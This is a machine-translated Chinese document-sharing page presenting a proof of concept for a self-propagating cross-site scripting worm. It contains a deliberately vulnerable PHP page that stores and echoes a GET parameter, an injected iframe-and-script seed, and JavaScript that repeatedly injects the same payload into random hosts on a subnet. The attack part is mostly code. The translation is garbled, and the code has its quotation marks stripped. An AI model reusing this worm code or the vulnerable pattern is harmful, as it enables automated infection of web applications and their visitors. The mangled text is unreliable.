跨站(xss)脚本病毒编写详解.docxVIP

  • 0
  • 0
  • 约3.11千字
  • 约 4页
  • 2026-01-28 发布于中国
  • 举报

跨站(xss)脚本病毒编写详解

(HaCkXi译文)2009-02-2308:55下面的概念证明表明了XSS病毒。脆弱的环境造成就是一个例子情景的XSS所需的病毒,并不表明详尽的一套可能的条件。这说明在长期的XSS一个web应用。在这种情况下,漏洞是通过利用获得的请求,这使得小病毒将创建。

最初的一个实例脆弱的web应用将种子与自我传播的代码。当此代码是由网页浏览器,它的结果在他们的感染。被感染的网页浏览器连接到随机地点和执行利用获得的要求。注入代码,从而进一步易受感染的Web应用与自我繁殖的代码。

下面制作的永久性的XSS利用PHP页面可以感染病毒。该网页接受一个参数(参数)值,并写入到一个文件(file.txt)。这个档案,然后返回请求的浏览器。该文件将包含以前的值的“参数”参数。如果没有参数是通过它会显示该文件没有更新。

Web应用程序:index.php

QUOTE:?php

$p=$HTTP_GET_VARS[param];

$filename=./file.txt;

if($p!=){

$handle=fopen($filename,wb);

fputs($handle,$p);

fclose($handle);

}

$handle=fopen($filename,r);

$contents=fread($handle,filesize($filename));

fclose($handle);

print$contents;

?

此网页的index.php主办的多个虚拟服务器在/24子网。一个网络应用实例种子,然后用以下代码检索javascript文件并执行它。另外,有可能注入到整个代码的脆弱的应用,而不是要求javascript文件。为了简洁明了,JavaScript文件(xssv.jsp)要求。

注入种子编号:

QUOTE:iframename=iframexid=iframexsrc=hiddenstyle=display:none

/iframe

scriptSRC=http://webserver/xssv.js/script

在javascript文件所要求的例子如下所示。其自我用途繁殖的iframe是定期重新使用loadIframe()函数。目标网站的IP地址的iframe是随机挑选的/24子网的功能通过get_random_ip()。该病毒使用的XSS相结合的这两项职能,并不断定期调用使用setInterval()函数。

Javascipt:xssv.jsp

QUOTE:functionloadIframe(iframeName,url){

if(window.frames[iframeName]){

window.frames[iframeName].location=url;

returnfalse;

}

elsereturntrue;

}

functiondo_request(){

varip=get_random_ip();

varexploit_string=iframename=iframe2id=iframe2+

src=hiddenstyle=display:none/iframe+

scriptSRC=http://webserver/xssv.js/script;

loadIframe(iframe2,

http://+ip+/index.php?param=+exploit_string);

}

functionget_random()

{

varranNum=Math.round(Math.random()*255);

returnranNum;

}

functionget_random_ip()

{

return10.0.0.+get_random();

}

setInterval(do_request(),10000);

看种子Web应用的浏览器造成感染其他网络应用的/24子网。这种感染,一直持续到一些,但并非所有的应用受到感染。在这一点上的浏览器是手动停止。另一个浏览器,然后用来查看一个新感染的Web应用。该病毒然后继续感染,其余未web应用程序的子网内。

这个概念证明表明,控制的条件下,没有什么不同,以一个真实的世界环境中,跨站脚本病毒可以自我繁殖和传染。

常规病毒分歧

常规病毒和执行居住在同一系统上。单独的XSS病毒的这两个要求的一种共生关系,服务器

文档评论(0)

1亿VIP精品文档

相关文档